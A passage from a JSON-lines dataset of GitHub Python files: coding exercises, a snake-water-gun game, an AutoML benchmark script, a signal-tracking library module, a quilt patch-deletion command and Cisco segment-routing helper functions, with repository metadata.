get_hit, get_miss):\n r = {'domains': {}, 'started': started, 'set_hit': set_hit, 'get_hit': set_hit, 'get_miss': get_miss}\n for domain in self.__data:\n r[\"domains\"][domain] = {'keys': len(self.__data[domain])}\n return str(r)\n\n # if name in self.__data:\n# # exp in self.__data[name][0]\n# if self.__data[name][0]: # exp is set\n# now = datetime.now().timestamp()\n# if now > float(self.__data[name][0]):\n# try:\n# del self.__data.remove[name] # remove from cache\n# except Exception as e:\n# pass\n# return None\n# return self.__data[name][1]\n# return None\n\n def dump(self):\n return self.__data\n\n","repo_name":"lhotakj/Kasi","sub_path":"kasi/Storage.py","file_name":"Storage.py","file_ext":"py","file_size_in_byte":2491,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"39931524965","text":"class Solution:\n def containsNearbyDuplicate(self, nums, k):\n store = {}\n for i in range(len(nums)):\n if nums[i] not in store:\n store[nums[i]] = []\n store[nums[i]].append(i)\n for key,v in store.items():\n if len(v) > 1:\n for i in range(1, len(v)):\n if abs(v[i-1]-v[i]) <= k:\n return True\n return False","repo_name":"mihir254/LeetCode","sub_path":"Easy/219-Contains-Duplicate-II.py","file_name":"219-Contains-Duplicate-II.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"13898638298","text":"#剑指offer 类似题\n# 有两个排序的数组 A1 和 A2, 内存在 A1 的末尾有足够多的空余空间容纳 A2.\n# 请实现一个函数,把 A2中的所有数字插入 A1 中,并且所有数字是有序的\narr1 = [3, 4, 7, 9, 10]\narr2 = [1, 2, 4, 5]\n\nres = arr1 + arr2\nprint(res)\np1 = len(arr1) - 1\np2 = len(arr2) - 1\ni = len(res) - 1\nwhile p1 > 0 and p2 > 0 :\n if arr1[p1] == arr2[p2]:\n res[i] = arr1[p1]\n i -= 1\n res[i] = arr2[p2]\n i -= 1\n p1 -= 1\n p2 -= 1\n elif arr1[p1] > arr2[p2]:\n res[i] = arr1[p1]\n i -= 1\n p1 -= 1\n else:\n res[i] = arr2[p2]\n i -= 1\n p2 -= 1\n\nwhile p1 != -1:\n res[i] = arr1[p1]\n p1 -= 1\n i -= 1\nwhile p2 != -1:\n res[i] = arr2[p2]\n p2 -= 1\n i -= 1\n\nprint(res)\n\n \n ","repo_name":"jasmine2018jixun/leetcode2020","sub_path":"leetcode2019/lintcode_212_空格替换.py","file_name":"lintcode_212_空格替换.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"20723265142","text":"import time\nimport json\nimport numpy as np\n\nfrom load_data import load_data\nfrom auto_ml import auto_ml\n\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.ensemble import RandomForestRegressor\n\n# Files\nfiles = []\nfor sim in np.arange(1, 11):\n\n files.append({\"train\": \"../data/Xy/\" + str(sim) + \"_train.csv\",\n \"test\": \"../data/Xy/\" + str(sim) + \"_test.csv\",\n \"task\": \"regression\",\n \"name\": str(sim)})\n\n# Backends\nbackends = [\"sklearn\", \"h2o\", \"tpot\"]\n\n# Settings\nruns = 10 # number of random data sets\ntime_to_run = 60 # run time for each dataset and engine in minutes\nfolds = 5 # number of folds used in cv\n\n# Loop over datasets\n#for run in [8, 9, ]:\nfor run in np.arange(runs):\n\n # Load/Sim data\n X_train, y_train, X_test, y_test = load_data(path_train=files[run][\"train\"], path_test=files[run][\"test\"])\n\n # Random Forest Benchmark\n print(\"Fitting Benchmark via Random Forest\")\n mod_rf = RandomForestRegressor(n_estimators=250)\n mod_rf.fit(X=X_train, y=y_train)\n y_hat_rf = mod_rf.predict(X=X_test)\n mse_benchmark = mean_squared_error(y_true=y_test, y_pred=y_hat_rf)\n\n # Loop 
over backends\n for engine in backends:\n\n # Verbose\n print(\"Starting \", engine + \" in \" + str(run), \"run\")\n\n # Start time tracking\n start_time = time.time()\n\n try:\n\n # Init model\n mod = auto_ml(backend=engine)\n mod.create_ml(run_time=time_to_run, folds=folds)\n\n # Fitting on training set\n mod.fit(X=X_train, y=y_train)\n\n # Predict on test set\n y_hat = mod.predict(X=X_test)\n\n # End time tracking\n time_elapsed = time.strftime(\"%H:%M:%S\", time.gmtime(time.time() - start_time))\n\n # Eval error on test set\n mse_score = mean_squared_error(y_true=y_test, y_pred=y_hat)\n\n # Results\n info = {\"run\": int(run),\n \"backend\": engine,\n \"mse_test\": mse_score,\n \"mse_benchmark\": mse_benchmark,\n \"time_elapsed\": time_elapsed}\n\n # Write log\n with open(\"../results/\" + time.strftime(\"%Y-%m-%d_%H-%M-%S\", time.gmtime(time.time())) + \"_\" + str(run) + \"_\" + str(engine) + \".json\", \"w\") as outfile:\n json.dump(info, outfile, sort_keys=True, indent=4)\n\n # Verbose\n print(\"Finished \" + engine + \" in \" + str(run) + \" run\")\n\n except (RuntimeError, TypeError, NameError):\n print(\"Error in \" + \"backend \" + engine + \" for \" + str(run), \"run\")\n\n\n\n\n","repo_name":"fabianmax/ML-Automation","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2625,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"16"} +{"seq_id":"15195403998","text":"# optimizer\noptimizer = dict(type='AdamW', lr=0.00006, weight_decay=0.0001)\n# optimizer = dict(type='Adam', lr=0.001, weight_decay=0.0005)\noptimizer_config = dict()\n# learning policy\n# lr_config = dict(policy='poly', power=1.00, min_lr=1e-5, by_epoch=False)\n# lr_config = dict(\n# policy='CosineAnnealingWarmRestarts',\n# warmup='linear',\n# warmup_iters=2000,\n# warmup_ratio=1.0 / 10,\n# min_lr_ratio=1e-5)\nlr_config = dict(\n policy='CosineRestart',\n restart_weights=[1,1,1,1,1],\n periods=[3750,7500,15000,30000,60000],\n min_lr=1e-6)\n# lr_config = dict(\n# policy='CosineRestart',\n# restart_weights=[1,1,1,1,1],\n# periods=[3000,6000,12000,24000,48000],\n# min_lr=1e-6)\n# runtime settings\nrunner = dict(type='IterBasedRunner', max_iters=120000)\ncheckpoint_config = dict(by_epoch=False, interval=2000, max_keep_ckpts=20)\nevaluation = dict(interval=2000, metric='mIoU')\n","repo_name":"nytbliang/HTMANet","sub_path":"configs/_base_/schedules/schedule_80k.py","file_name":"schedule_80k.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"23436845675","text":"# -*- coding: utf-8 -*-\n\"\"\"Tracks\nEach track has a fs and a duration. 
There are 4 kinds of tracks:\n\n1 Event - times\n2 Wave - values\n3 TimeValue - values at times, duration\n4 Partition - values between times\n\nAll track intervals are of the type [), and duration points to the next unoccupied sample == length\n\"\"\"\n\nimport logging\nfrom builtins import str\nfrom pathlib import Path\nfrom typing import List, Optional, Union\n\nimport numpy\nfrom signalworks.tracking.metatrack import MetaTrack\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.DEBUG)\n# logger.setLevel(logging.WARNING)\n# logger.setLevel(logging.ERROR)\n\nTIME_TYPE = numpy.int64\n\n\ndef convert_dtype(source, target_dtype):\n \"\"\"\n return a link (if unchanged) or copy of signal in the specified dtype (often changes bit-depth as well)\n \"\"\"\n assert isinstance(source, numpy.ndarray)\n source_dtype = source.dtype\n assert source_dtype in (\n numpy.int16,\n numpy.int32,\n numpy.float32,\n numpy.float64,\n ), \"source must be a supported type\"\n assert target_dtype in (\n numpy.int16,\n numpy.int32,\n numpy.float32,\n numpy.float64,\n ), \"target must be a supported type\"\n if source_dtype == target_dtype:\n return source\n else: # conversion\n if source_dtype == numpy.int16:\n if target_dtype == numpy.int32:\n return source.astype(target_dtype) << 16\n else: # target_dtype == numpy.float32 / numpy.float64:\n return source.astype(target_dtype) / (1 << 15)\n elif source_dtype == numpy.int32:\n if target_dtype == numpy.int16:\n return (source >> 16).astype(target_dtype) # lossy\n else: # target_dtype == numpy.float32 / numpy.float64:\n return source.astype(target_dtype) / (1 << 31)\n else: # source_dtype == numpy.float32 / numpy.float64\n M = numpy.max(numpy.abs(source))\n limit = 1 - 1e-16\n if M > limit:\n factor = limit / M\n logger.warning(\n f\"maximum float waveform value {M} is beyond [-{limit}, {limit}],\"\n f\"applying scaling of {factor}\"\n )\n source *= factor\n if target_dtype == numpy.float32 or target_dtype == numpy.float64:\n return source.astype(target_dtype)\n else:\n if target_dtype == numpy.int16:\n return (source * (1 << 15)).astype(target_dtype) # dither?\n else: # target_dtype == numpy.int32\n return (source * (1 << 31)).astype(target_dtype) # dither?\n\n\nclass Track(MetaTrack):\n default_suffix = \".trk\"\n\n def __init__(self, path):\n self._fs = 0\n self.type: Optional[str] = None\n self.min: Union[int, float, None] = None\n self.max: Union[int, float, None] = None\n self.unit: Optional[str] = None\n self.label: Optional[str] = None\n if path is None:\n path = str(id(self))\n self.path = Path(path).with_suffix(self.default_suffix)\n\n def get_time(self):\n raise NotImplementedError\n\n def set_time(self, time):\n raise NotImplementedError\n\n time = property(get_time, set_time)\n\n def get_value(self):\n raise NotImplementedError\n\n def set_value(self, value):\n raise NotImplementedError\n\n value = property(get_value, set_value)\n\n def get_fs(self):\n return self._fs\n\n def set_fs(self, _value):\n raise Exception(\"Cannot change fs, try resample()\")\n\n fs = property(get_fs, set_fs, doc=\"sampling frequency\")\n\n def get_duration(self):\n pass\n\n def set_duration(self, duration):\n raise NotImplementedError\n\n duration = property(get_duration, set_duration)\n\n def __eq__(self, other):\n raise NotImplementedError\n\n def __ne__(self, other):\n raise NotImplementedError\n\n def __len__(self):\n pass\n\n def __str__(self):\n pass\n\n def __add__(self, other):\n raise NotImplementedError\n\n @classmethod\n def read(cls, path, samplerate=None):\n 
# we do the imports here to avoid circular import when Wave inherits Track, and Track call Wave's function\n # we only need a function from the dependencies\n from signalworks.tracking.partition import Partition\n from signalworks.tracking.timevalue import TimeValue\n from signalworks.tracking.wave import Wave\n from signalworks.tracking.multitrack import MultiTrack\n\n \"\"\"Loads object from name, adding default extension if missing.\"\"\"\n # E = []\n suffix = Path(path).suffix\n\n with open(path, \"rb\") as fileIn:\n bufHeader = fileIn.read(38)\n if (\n (bufHeader[0:4] == b\"RIFF\")\n and (bufHeader[12:16] == b\"fmt \")\n and (bufHeader[0:5] != b\"RIFFB\")\n ):\n channels = None\n mmap = False\n return Wave.wav_read(path, channels, mmap)\n elif suffix == \".tmv\":\n return TimeValue.read_tmv(path) # for now, handle nans\n elif suffix == \".lab\":\n return Partition.read(path)\n elif suffix == \".edf\":\n return MultiTrack.read_edf(path)\n elif suffix == \".xdf\":\n return MultiTrack.read_xdf(path)\n else:\n channels = None\n mmap = False\n return Wave.wav_read(path, channels, mmap)\n\n def write(self, name, *args, **kwargs):\n \"\"\"Saves object to name, adding default extension if missing.\"\"\"\n raise NotImplementedError\n\n def resample(self, fs):\n \"\"\"resample self to a certain fs\"\"\"\n raise NotImplementedError\n\n def select(self, a, b):\n \"\"\"\n return a selection of the track from a to b. a and b are in fs units.\n Times are new objects, but values are views - idea is to make a read-only section, not a copy\n \"\"\"\n raise NotImplementedError\n\n def insert(self, a, t):\n raise NotImplementedError\n\n def remove(self, a, b):\n raise NotImplementedError\n\n def copy(self, a, b):\n raise NotImplementedError\n\n def cut(self, a, b):\n t = self.copy(a, b)\n self.remove(a, b)\n return t\n\n\ndef get_track_classes() -> List[Track]:\n def all_subclasses(c):\n return c.__subclasses__() + [\n a for b in c.__subclasses__() for a in all_subclasses(b)\n ]\n\n return [obj for obj in all_subclasses(Track)]\n\n\n# TODO: class NamedEvent(_Track)\n# there hasn't been a need for it yet, but may be useful in the future\n# wonder if I can extend Event itself with optional values...\n# class NamedEvent(_Track):\n# def __init__(self, time, value, fs, duration)\n\n\n# class HetMultiTrack(MultiTrack): # may want to define common abstract class instead\n# \"\"\"\n# A dictionary containing time-synchronous tracks of equal duration, but HETEROGENOUS fs\n# \"\"\"\n\n# # this fs relates to the manner by which we time-index (possibly with float) into the multitrack object.\n# # Use 1.0 for seconds.\n# def __init__(self, mapping=dict(), fs=1.0):\n# dict.__init__(self, mapping)\n# if __debug__: # long assert - TODO: do this on mapping, and then assign\n# self.check()\n# self._fs = fs\n\n# def check(self):\n# if len(self) > 1:\n# duration = None\n# for i, (key, track) in enumerate(self.items()):\n# if duration is None:\n# duration = track.duration / track.fs\n# if track.duration / track.fs != duration:\n# raise AssertionError(\n# f\"all durations must be equal, track #{i} ('{key}') does not match track #1\"\n# )\n\n# def get_fs(self):\n# if len(self):\n# return self._fs\n# else:\n# return 0 # or raise?\n\n# def set_fs(self, fs):\n# self._fs = fs\n\n# fs = property(get_fs, set_fs, doc=\"sampling frequency of time-index\")\n\n# def select(self, a, b, keys=None):\n# assert a >= 0\n# assert a < b # or a <= b?\n# assert b <= self.duration\n# \"\"\"return a new object with all track views from time a to 
b\"\"\"\n# if keys is None:\n# keys = self.keys()\n# obj = type(self)()\n# for key in keys:\n# trk = self[key]\n# obj[key] = trk.select(\n# a / self._fs * trk._fs, b / self._fs * trk._fs\n# ) # untested\n# return obj\n\n# def test_pml(self):\n# import tempfile\n# tmp = tempfile.NamedTemporaryFile(prefix='test_pml_')\n# filename = tmp.name\n# tmp.close()\n# self.t.pmlwrite(filename)\n# s = Event.pmlread(filename)\n# os.unlink(filename)\n# # duration CANNOT be encoded in the file (or can it?)\n# s.duration = int(numpy.round(self.t.duration * s.fs / self.t.fs))\n# s = s.resample(self.t.fs)\n# self.assertTrue(numpy.allclose(s.time, self.t.time))\n","repo_name":"TimeViewers/signalworks","sub_path":"signalworks/tracking/tracking.py","file_name":"tracking.py","file_ext":"py","file_size_in_byte":9039,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"26559230805","text":"# -*- coding: utf-8 -*-\n\n\n# Задача: вычислить 3 тикера с максимальной и 3 тикера с минимальной волатильностью в МНОГОПРОЦЕССНОМ стиле\n#\n# Бумаги с нулевой волатильностью вывести отдельно.\n# Результаты вывести на консоль в виде:\n# Максимальная волатильность:\n# ТИКЕР1 - ХХХ.ХХ %\n# ТИКЕР2 - ХХХ.ХХ %\n# ТИКЕР3 - ХХХ.ХХ %\n# Минимальная волатильность:\n# ТИКЕР4 - ХХХ.ХХ %\n# ТИКЕР5 - ХХХ.ХХ %\n# ТИКЕР6 - ХХХ.ХХ %\n# Нулевая волатильность:\n# ТИКЕР7, ТИКЕР8, ТИКЕР9, ТИКЕР10, ТИКЕР11, ТИКЕР12\n# Волатильности указывать в порядке убывания. Тикеры с нулевой волатильностью упорядочить по имени.\n#\nimport multiprocessing\n\nfrom path_sort_data import get_path, sort, output_data\n\n\nclass SecuritiesVolatility(multiprocessing.Process):\n\n def __init__(self, file_name, collector, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.file_name = file_name\n self.collector = collector\n self.securities = {}\n\n def volatility_calculation(self):\n with open(self.file_name, 'r', encoding='utf8') as file:\n prices = []\n for line in file:\n if line != 'SECID,TRADETIME,PRICE,QUANTITY\\n':\n elems = line.split(',')\n price = float(elems[2])\n security_paper = elems[0]\n prices.append(price)\n min_price = min(prices)\n max_price = max(prices)\n average_price = (max_price + min_price) / 2\n volatility = round(((max_price - min_price) / average_price) * 100, 2)\n self.securities[security_paper] = volatility\n self.collector.put(self.securities)\n\n def run(self):\n self.volatility_calculation()\n\n\nif __name__ == '__main__':\n\n securities_volatility = {}\n\n wanted_folder = 'trades'\n path = get_path(wanted_folder)\n\n collector = multiprocessing.Queue()\n data_securities = [SecuritiesVolatility(file_name=file, collector=collector) for file in path]\n\n for process in data_securities:\n process.start()\n\n for process in data_securities:\n process.join()\n\n while not collector.empty():\n data = collector.get()\n securities_volatility.update(data)\n\n data = sort(securities_volatility)\n securities_volatility = data[0]\n zero_volatility = data[1]\n output_data(securities_volatility, zero_volatility)\n# зачет!\n","repo_name":"tidml/python_base","sub_path":"lesson_012/03_volatility_with_processes.py","file_name":"03_volatility_with_processes.py","file_ext":"py","file_size_in_byte":2819,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"18151778464","text":"#Problem 2\r\n#Kullanıcıdan 3 tane sayı alın ve en büyük sayıyı ekrana yazdırın.\r\n\r\ns1=int(input(\"1.Sayı: \"))\r\ns2=int(input(\"2.Sayı: 
\"))\r\ns3=int(input(\"3.Sayı: \"))\r\n\r\nif(s1>s2 and s1>s3):\r\n print(\"Sayu 1 En Büyük.\")\r\nelif(s2>s3 and s2>s1):\r\n print(\"Sayı 2 En Büyük.\")\r\nelif(s3>s2 and s3>s1):\r\n print(\"Sayu 3 En büyük.\") ","repo_name":"4Noyis/Python","sub_path":"Python/Part_2/Problem_2.py","file_name":"Problem_2.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"71302620167","text":"from quilt.command import Command\nfrom quilt.db import Db, Series\nfrom quilt.error import NoPatchesInSeries, NoAppliedPatch, UnknownPatch, \\\n QuiltError\nfrom quilt.patch import Patch\nfrom quilt.pop import Pop\nfrom quilt.signals import Signal\nfrom quilt.utils import Directory, File\n\n\nclass Delete(Command):\n\n \"\"\"Command class to delete patches\n \"\"\"\n\n deleting_patch = Signal()\n deleted_patch = Signal()\n\n def __init__(self, cwd, quilt_pc, quilt_patches):\n super(Delete, self).__init__(cwd)\n self.quilt_pc = Directory(quilt_pc)\n self.quilt_patches = Directory(quilt_patches)\n self.db = Db(quilt_pc)\n self.series = Series(quilt_patches)\n self.pop = Pop(cwd, quilt_pc)\n\n def _delete_patch(self, patch, remove=False, backup=False):\n if self.series.is_empty():\n raise NoPatchesInSeries(self.series)\n if not self.series.is_patch(patch):\n raise UnknownPatch(self.series, patch)\n\n applied = self.db.top_patch() == patch\n self.deleting_patch(patch, applied)\n\n if applied:\n self.pop._unapply_patch(patch)\n self.db = self.pop.db\n self.db.save()\n\n self.series.remove_patch(patch)\n self.series.save()\n\n patch_file = self.quilt_patches + File(patch.get_name())\n\n if remove:\n if backup:\n patch_file.copy(File(patch_file.get_name() + \"~\"))\n\n patch_file.delete_if_exists()\n\n self.deleted_patch(patch)\n\n def delete_next(self, remove=False, backup=False):\n \"\"\" Delete next unapplied patch\n If remove is True the patch file will also be removed. If remove and\n backup are True a copy of the deleted patch file will be made.\n \"\"\"\n patch = self.db.top_patch()\n if patch:\n after = self.series.patch_after(patch)\n else:\n after = self.series.first_patch()\n if not after:\n raise QuiltError(\"No next patch\")\n\n self._delete_patch(after, remove=remove, backup=backup)\n\n def delete_patch(self, patch_name=None, remove=False, backup=False):\n \"\"\" Delete specified patch from the series\n If remove is True the patch file will also be removed. 
If remove and\n backup are True a copy of the deleted patch file will be made.\n \"\"\"\n if patch_name:\n patch = Patch(patch_name)\n else:\n patch = self.db.top_patch()\n if not patch:\n raise NoAppliedPatch(self.db)\n\n self._delete_patch(patch, remove=remove, backup=backup)\n","repo_name":"bjoernricks/python-quilt","sub_path":"quilt/delete.py","file_name":"delete.py","file_ext":"py","file_size_in_byte":2620,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"16"} +{"seq_id":"25174028942","text":"import csv\nimport sys\nimport pydot\nimport numpy as np\nfrom sklearn import tree\nfrom sklearn import preprocessing\nfrom sklearn.externals.six import StringIO\nclass_names=['low','medium','high']\n#Args checking\nif(len(sys.argv) is not 3):\n\tprint(\"Usage: python3 E13.py <input_training_file> <output_pdf_file>\")\n\texit()\n#Files open\ntraining=list(csv.reader(open(sys.argv[1])))\nfeature_names=training[0][1:-1]\ntraining=training[1:]\n#Training data separation\ntarget=list(map(lambda x : x[-1],training))\nle = preprocessing.LabelEncoder()\nle.fit(class_names)\n\nclass_names=le.inverse_transform(np.sort(le.transform(class_names)))\n\ntarget=le.transform(target)\n\ndata=np.array(list(map(lambda x : x[1:-1],training)))\n\n#Decision Tree Training\ntreeClas=tree.DecisionTreeClassifier()\ntreeClas.fit(data, target)\n\n#Decision Tree Plot\ndot_data = StringIO()\n\ntree.export_graphviz(treeClas, out_file=dot_data,feature_names=feature_names,class_names=class_names,filled=True, rounded=True, special_characters=True)\n\ngraph = pydot.graph_from_dot_data(dot_data.getvalue())\ngraph.write_pdf(path=sys.argv[2])\n","repo_name":"Xiul109/MachineLearningTec","sub_path":"E13.py","file_name":"E13.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"16168737272","text":"'''SNAKE WATER GUN GAME'''\r\n'''IN THIS STEP WE ARE IMPORTING AN INBUILT MODULE RANDOM WHICH WILL HELP US IN RANDOMIZING THE COMPUTERS OUTPUT'''\r\nimport random\r\n'''THIS IS A MODULE FOR MAKING GUI'''\r\nimport easygui\r\ndef game(user,comp):#HERE WE ARE DEFINING A FUNCTION THAT WILL HELP US IN COMPARING THE OUTPUT OF THE USER AND THE COMPUTER AND DECIDE THE WINNER\r\n if user==comp:\r\n return None\r\n elif comp=='s':\r\n if user=='w':\r\n return False\r\n elif user=='g':\r\n return True \r\n elif comp=='w':\r\n if user=='s':\r\n return True\r\n elif user=='g':\r\n return False\r\n elif comp=='g':\r\n if user=='s':\r\n return False\r\n elif user=='w':\r\n return True #THIS PART IS THE LOGICAL PART\r\n'''NOW WE NEED TO THINK ABOUT THE COMPUTER OUTPUT '''\r\ncomp=(\"Computer's turn : Snake(s) Water(w) Gun(g)\")\r\nrandno=random.randint(1,3) #SO AFTER CALLING THE RANDOM FUNCTION WE ARE GRNERATING RANDOM NUMBERS BETWEEEN 1 AND 3 \r\nif randno==1:\r\n comp='s'\r\nelif randno==2:\r\n comp='w'\r\nelse:\r\n comp='g' #ASSIGNED THOSE VALUES TO THE COMPUTERS OUTPUT\r\n# '''TAKING INPUT FROM THE USER''' \r\nprint(\"WELCOME TO THE GAME OF SNAKE WATER AND GUN SNAKE YOU ARE AGAINST COMPUTER \\n MAY THE BETTER PLAYER WIN \") \r\nuser=input(\"User's turn: Snake(s) Water(w) Gun(g): \")\r\nprint(f\"Computer chose {comp}\")\r\nprint(f\"user chose {user}\")\r\nf=game(user,comp)\r\nif f==None:\r\n easygui.ynbox('ITS A DRAW !')\r\nelif f:\r\n easygui.ynbox('YOU WIN COMPUTER NOOBDA')\r\nelse:\r\n easygui.ynbox('YOU LOOSE KOI 
NA')\r\n\r\n","repo_name":"mayankfulara/Snake-Water-Gun-Game","sub_path":"SnakeWate.py","file_name":"SnakeWate.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"42327018291","text":"\"\"\" Common get functions for segment-routing \"\"\"\r\n\r\n# Python\r\nimport re\r\nimport logging\r\n\r\n# pyATS\r\nfrom pyats.utils.objects import find, R\r\n\r\n# Genie\r\nfrom genie.libs.sdk.libs.utils.normalize import GroupKeys\r\nfrom genie.metaparser.util.exceptions import SchemaEmptyParserError\r\n\r\n# Running-Config\r\nfrom genie.libs.sdk.apis.iosxe.running_config.get import (\r\n get_running_config_section_dict,\r\n)\r\n\r\nlog = logging.getLogger(__name__)\r\n\r\n\r\ndef get_segment_routing_policy_active_path_hop_labels(device, policy,\r\n policy_dict=None, ignore_first_label=False):\r\n \"\"\" Find a segement-routing policy in expected state\r\n\r\n Args:\r\n device ('obj'): Device object\r\n policy ('str'): Policy name\r\n policy_dict ('dict'): Policy dict from parser output\r\n IOSXE Parser - ShowSegmentRoutingTrafficEngPolicy\r\n cmd - show segment-routing traffic-eng policy all\r\n ignore_first_label (`bool`): flag to ignore first label\r\n Returns:\r\n labels ('list'): Hop labels\r\n \"\"\"\r\n labels = []\r\n cmd = 'show segment-routing traffic-eng policy name {policy}'.format(policy=policy)\r\n if policy_dict is None:\r\n try:\r\n out = device.parse(cmd)\r\n except Exception as e:\r\n log.error(\"Failed to parse '{cmd}': {e}\".format(cmd=cmd, e=e))\r\n return labels\r\n else:\r\n out = policy_dict\r\n\r\n # Check explicit path\r\n reqs = R(['(.*{}.*)'.format(policy),'candidate_paths',\r\n 'preference','(?P<preference>.*)',\r\n 'path_type','explicit',\r\n '(?P<category>.*)','(?P<name>.*)',\r\n 'status','(?P<status>.*)'])\r\n explicit = find([out], reqs, filter_=False, all_keys=True)\r\n if explicit:\r\n keys = GroupKeys.group_keys(reqs=reqs.args, ret_num={},\r\n source=explicit, all_keys=True)\r\n \r\n for item in keys:\r\n if item['status'] == 'active':\r\n path_index = item['preference']\r\n\r\n reqs2 = R(['(.*{}.*)'.format(policy),'candidate_paths',\r\n 'preference',path_index,\r\n 'path_type','explicit',\r\n '(?P<category>.*)','(?P<name>.*)',\r\n 'hops','(?P<hops>.*)'])\r\n hops = find([out], reqs2, filter_=False, all_keys=True)\r\n if hops:\r\n hop = hops[0][0]\r\n for value in hop.values():\r\n sid = value.get('sid', '')\r\n labels.append(str(sid))\r\n\r\n if ignore_first_label and len(labels):\r\n labels.pop(0)\r\n return labels\r\n\r\n # Check dynamic path if no active path in explicit path\r\n reqs = R(['(.*{}.*)'.format(policy),'candidate_paths',\r\n 'preference','(?P<preference>.*)',\r\n 'path_type','dynamic',\r\n 'status','(?P<status>.*)'])\r\n dynamic = find([out], reqs, filter_=False, all_keys=True)\r\n if dynamic:\r\n keys = GroupKeys.group_keys(reqs=reqs.args, ret_num={},\r\n source=dynamic, all_keys=True)\r\n\r\n for item in keys:\r\n if item['status'] == 'active':\r\n path_index = item['preference']\r\n\r\n reqs2 = R(['(.*{}.*)'.format(policy),'candidate_paths',\r\n 'preference',path_index,\r\n 'path_type','dynamic',\r\n 'hops','(?P<hops>.*)'])\r\n hops = find([out], reqs2, filter_=False, all_keys=True)\r\n if hops:\r\n hop = hops[0][0]\r\n for value in hop.values():\r\n sid = value.get('sid', '')\r\n labels.append(str(sid))\r\n\r\n if ignore_first_label and len(labels):\r\n labels.pop(0)\r\n return labels\r\n\r\n\r\ndef get_segment_routing_policy_in_state(device, 
expected_admin='up', expected_oper='up',\\\r\n expected_color='', expected_endpoint=''):\r\n \"\"\" Find a segement-routing policy in expected state\r\n\r\n Args:\r\n device ('obj'): Device object\r\n expected_admin ('str'): Expected admin state\r\n expected_oper ('str'): Expected operational state\r\n expected_color (`str`): Expected color\r\n expected_endpoint (`str`): Expected end-point address\r\n Returns:\r\n policy ('str'): Policy name\r\n \"\"\"\r\n cmd = 'show segment-routing traffic-eng policy all'\r\n try:\r\n out = device.parse(cmd)\r\n except Exception as e:\r\n log.error(\"Failed to parse '{cmd}': {e}\".format(cmd=cmd, e=e))\r\n return None\r\n\r\n for policy in out.keys():\r\n admin = out.get(policy, {}).get('status', {}).get('admin', '')\r\n oper = out.get(policy, {}).get('status', {}).\\\r\n get('operational', {}).get('state', '')\r\n color = str(out.get(policy, {}).get('color', ''))\r\n endpoint = out.get(policy, {}).get('end_point', '')\r\n\r\n if (admin.lower() == expected_admin.lower() and \r\n oper.lower() == expected_oper.lower() and \r\n color == expected_color and \r\n endpoint == expected_endpoint):\r\n return policy\r\n else:\r\n log.info(\"Failed to find a policy with admin state {admin} \"\r\n \"and oper state {oper}\".format(admin=expected_admin,\r\n oper=expected_oper))\r\n return None\r\n\r\n\r\ndef get_segment_routing_sid_map_configuration(device, address_family=\"ipv4\"):\r\n \"\"\" Get Segment routing SID map configuration\r\n\r\n Args:\r\n device ('str'): Device str\r\n address_family ('str'): Address family\r\n Returns:\r\n Dictionary with ip address as key and sid as value\r\n ex.)\r\n {\r\n '192.168.1.1': '1',\r\n '192.168.1.2': '2'\r\n }\r\n \"\"\"\r\n out = get_running_config_section_dict(\r\n device=device, section=\"segment-routing\"\r\n )\r\n\r\n sid_dict = {}\r\n\r\n if not out:\r\n return None\r\n\r\n p1 = re.compile(r\"^(?P<ip_address>\\S+) index (?P<sid>\\d+) range \\d+$\")\r\n\r\n connected_prefix_sid_maps = out[\"segment-routing mpls\"][\r\n \"connected-prefix-sid-map\"\r\n ][\"address-family {}\".format(address_family)].keys()\r\n\r\n for key in connected_prefix_sid_maps:\r\n key = key.strip()\r\n m = p1.match(key)\r\n if m:\r\n group = m.groupdict()\r\n sid_dict.update({group[\"ip_address\"]: group[\"sid\"]})\r\n continue\r\n\r\n return sid_dict\r\n\r\n\r\ndef get_segment_routing_lb_range(device):\r\n \"\"\" Gets segement-routing local block range\r\n\r\n Args:\r\n device ('obj'): device to use\r\n\r\n Returns:\r\n ('int', 'int'): label_min, label_max\r\n\r\n Raises:\r\n N/A\r\n \"\"\"\r\n try:\r\n out = device.parse(\"show segment-routing mpls lb\")\r\n except SchemaEmptyParserError:\r\n return None, None\r\n\r\n return out.get(\"label_min\"), out.get(\"label_max\")\r\n\r\n\r\ndef get_segment_routing_gb_range(device):\r\n \"\"\" Gets segement-routing global block range\r\n\r\n Args:\r\n device ('obj'): device to use\r\n\r\n Returns:\r\n ('int', 'int'): label_min, label_max\r\n\r\n Raises:\r\n None\r\n \"\"\"\r\n try:\r\n out = device.parse(\"show segment-routing mpls gb\")\r\n except SchemaEmptyParserError:\r\n return None, None\r\n\r\n return out.get(\"label_min\"), out.get(\"label_max\")\r\n\r\ndef get_segment_routing_accumulated_path_metric(device, preference, policy_name=None):\r\n \"\"\" Get accumulated path metric for a preference path\r\n\r\n Args:\r\n device ('obj'): Device to use\r\n policy_name ('str'): Policy name to verify. 
